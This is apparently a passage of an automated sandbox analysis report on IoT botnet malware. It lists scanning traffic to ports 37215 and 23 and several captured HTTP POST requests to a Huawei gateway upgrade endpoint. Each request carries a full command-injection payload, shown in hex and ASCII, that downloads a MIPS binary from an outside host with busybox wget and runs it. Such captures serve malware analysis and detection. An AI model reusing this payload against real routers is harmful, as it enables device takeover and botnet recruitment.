                                              Nov 23, 2023 05:14:52.376415968 CET4783037215192.168.2.14156.207.231.15
                                              Nov 23, 2023 05:14:52.376427889 CET4783037215192.168.2.14197.173.10.214
                                              Nov 23, 2023 05:14:52.376427889 CET4783037215192.168.2.14156.139.118.170
                                              Nov 23, 2023 05:14:52.376435041 CET4783037215192.168.2.14197.133.216.89
                                              Nov 23, 2023 05:14:52.376450062 CET4783037215192.168.2.14197.113.3.130
                                              Nov 23, 2023 05:14:52.376457930 CET4783037215192.168.2.1441.206.166.245
                                              Nov 23, 2023 05:14:52.376463890 CET4783037215192.168.2.14197.59.108.184
                                              Nov 23, 2023 05:14:52.376477957 CET4783037215192.168.2.14156.96.53.188
                                              Nov 23, 2023 05:14:52.376509905 CET4783037215192.168.2.14197.35.208.128
                                              Nov 23, 2023 05:14:52.376523018 CET4783037215192.168.2.14197.179.91.175
                                              Nov 23, 2023 05:14:52.376523018 CET4783037215192.168.2.14197.57.26.214
                                              Nov 23, 2023 05:14:52.376539946 CET4783037215192.168.2.14156.194.133.222
                                              Nov 23, 2023 05:14:52.376539946 CET4783037215192.168.2.14156.216.191.125
                                              Nov 23, 2023 05:14:52.376539946 CET4783037215192.168.2.14156.130.15.38
                                              Nov 23, 2023 05:14:52.376552105 CET4783037215192.168.2.14197.61.72.81
                                              Nov 23, 2023 05:14:52.376553059 CET4783037215192.168.2.14156.28.209.167
                                              Nov 23, 2023 05:14:52.376559019 CET4783037215192.168.2.14156.125.224.129
                                              Nov 23, 2023 05:14:52.376568079 CET4783037215192.168.2.1441.140.8.34
                                              Nov 23, 2023 05:14:52.376568079 CET4783037215192.168.2.14156.145.156.99
                                              Nov 23, 2023 05:14:52.376581907 CET4783037215192.168.2.14156.84.135.39
                                              Nov 23, 2023 05:14:52.376588106 CET4783037215192.168.2.1441.15.185.147
                                              Nov 23, 2023 05:14:52.376588106 CET4783037215192.168.2.1441.164.201.58
                                              Nov 23, 2023 05:14:52.376588106 CET4783037215192.168.2.1441.178.77.33
                                              Nov 23, 2023 05:14:52.376609087 CET4783037215192.168.2.1441.222.203.190
                                              Nov 23, 2023 05:14:52.376611948 CET4783037215192.168.2.14197.254.25.120
                                              Nov 23, 2023 05:14:52.376629114 CET4783037215192.168.2.14156.124.121.13
                                              Nov 23, 2023 05:14:52.376632929 CET4783037215192.168.2.14156.222.102.207
                                              Nov 23, 2023 05:14:52.376638889 CET4783037215192.168.2.14156.6.156.34
                                              Nov 23, 2023 05:14:52.376648903 CET4783037215192.168.2.14197.172.192.84
                                              Nov 23, 2023 05:14:52.376660109 CET4783037215192.168.2.14197.54.49.228
                                              Nov 23, 2023 05:14:52.376662970 CET4783037215192.168.2.1441.147.193.110
                                              Nov 23, 2023 05:14:52.376674891 CET4783037215192.168.2.1441.212.224.163
                                              Nov 23, 2023 05:14:52.376691103 CET4783037215192.168.2.14197.146.126.153
                                              Nov 23, 2023 05:14:52.376694918 CET4783037215192.168.2.14156.38.166.62
                                              Nov 23, 2023 05:14:52.376703978 CET4783037215192.168.2.1441.218.228.151
                                              Nov 23, 2023 05:14:52.376725912 CET4783037215192.168.2.1441.224.46.57
                                              Nov 23, 2023 05:14:52.376725912 CET4783037215192.168.2.14156.8.102.206
                                              Nov 23, 2023 05:14:52.376737118 CET4783037215192.168.2.14156.94.186.89
                                              Nov 23, 2023 05:14:52.376745939 CET4783037215192.168.2.14197.152.212.122
                                              Nov 23, 2023 05:14:52.376751900 CET4783037215192.168.2.14156.19.230.247
                                              Nov 23, 2023 05:14:52.376763105 CET4783037215192.168.2.14156.196.111.202
                                              Nov 23, 2023 05:14:52.376775026 CET4783037215192.168.2.14156.8.179.89
                                              Nov 23, 2023 05:14:52.376785040 CET4783037215192.168.2.14156.105.195.225
                                              Nov 23, 2023 05:14:52.376786947 CET4783037215192.168.2.1441.29.44.29
                                              Nov 23, 2023 05:14:52.376796007 CET4783037215192.168.2.14197.244.70.202
                                              Nov 23, 2023 05:14:52.376810074 CET4783037215192.168.2.14156.249.246.192
                                              Nov 23, 2023 05:14:52.376812935 CET4783037215192.168.2.14156.54.237.235
                                              Nov 23, 2023 05:14:52.376847982 CET4783037215192.168.2.14156.3.45.242
                                              Nov 23, 2023 05:14:52.376859903 CET4783037215192.168.2.1441.13.128.170
                                              Nov 23, 2023 05:14:52.376868963 CET4783037215192.168.2.14156.59.23.160
                                              Nov 23, 2023 05:14:52.376883984 CET4783037215192.168.2.14197.130.190.237
                                              Nov 23, 2023 05:14:52.376887083 CET4783037215192.168.2.14156.71.255.208
                                              Nov 23, 2023 05:14:52.376890898 CET4783037215192.168.2.1441.27.56.60
                                              Nov 23, 2023 05:14:52.376890898 CET4783037215192.168.2.1441.34.172.205
                                              Nov 23, 2023 05:14:52.376907110 CET4783037215192.168.2.14156.119.40.169
                                              Nov 23, 2023 05:14:52.393511057 CET5956637215192.168.2.1441.78.156.233
                                              Nov 23, 2023 05:14:52.399856091 CET2358850103.131.217.200192.168.2.14
                                              Nov 23, 2023 05:14:52.399945021 CET5885023192.168.2.14103.131.217.200
                                              Nov 23, 2023 05:14:52.400010109 CET4782823192.168.2.14164.27.134.125
                                              Nov 23, 2023 05:14:52.400010109 CET4782823192.168.2.14246.162.135.213
                                              Nov 23, 2023 05:14:52.400011063 CET4782823192.168.2.1479.51.137.65
                                              Nov 23, 2023 05:14:52.400019884 CET4782823192.168.2.14249.101.66.67
                                              Nov 23, 2023 05:14:52.400034904 CET4782823192.168.2.1477.54.62.145
                                              Nov 23, 2023 05:14:52.400062084 CET4782823192.168.2.14201.85.138.253
                                              Nov 23, 2023 05:14:52.400062084 CET4782823192.168.2.14219.114.214.189
                                              Nov 23, 2023 05:14:52.400062084 CET4782823192.168.2.1464.66.211.251
                                              Nov 23, 2023 05:14:52.400064945 CET4782823192.168.2.14177.4.230.67
                                              Nov 23, 2023 05:14:52.400094032 CET4782823192.168.2.14180.196.165.224
                                              Nov 23, 2023 05:14:52.400094986 CET4782823192.168.2.14111.185.106.133
                                              Nov 23, 2023 05:14:52.400095940 CET4782823192.168.2.14211.143.244.115
                                              Nov 23, 2023 05:14:52.400095940 CET4782823192.168.2.1432.34.86.255
                                              Nov 23, 2023 05:14:52.400100946 CET4782823192.168.2.1454.10.68.130
                                              Nov 23, 2023 05:14:52.400127888 CET4782823192.168.2.14240.191.234.9
                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Nov 23, 2023 05:17:34.964514971 CET192.168.2.141.1.1.10xfba3Standard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)false
                                              Nov 23, 2023 05:17:34.964612961 CET192.168.2.141.1.1.10x6ebStandard query (0)daisy.ubuntu.com28IN (0x0001)false
                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Nov 23, 2023 05:17:35.091347933 CET1.1.1.1192.168.2.140xfba3No error (0)daisy.ubuntu.com162.213.35.25A (IP address)IN (0x0001)false
                                              Nov 23, 2023 05:17:35.091347933 CET1.1.1.1192.168.2.140xfba3No error (0)daisy.ubuntu.com162.213.35.24A (IP address)IN (0x0001)false
                                              Session IDSource IPSource PortDestination IPDestination Port
                                              0192.168.2.1442390156.226.15.20937215
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:14:51.326800108 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:14:52.937493086 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:14:54.857528925 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:14:58.825254917 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:15:06.504991055 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:15:21.864275932 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:15:53.095022917 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
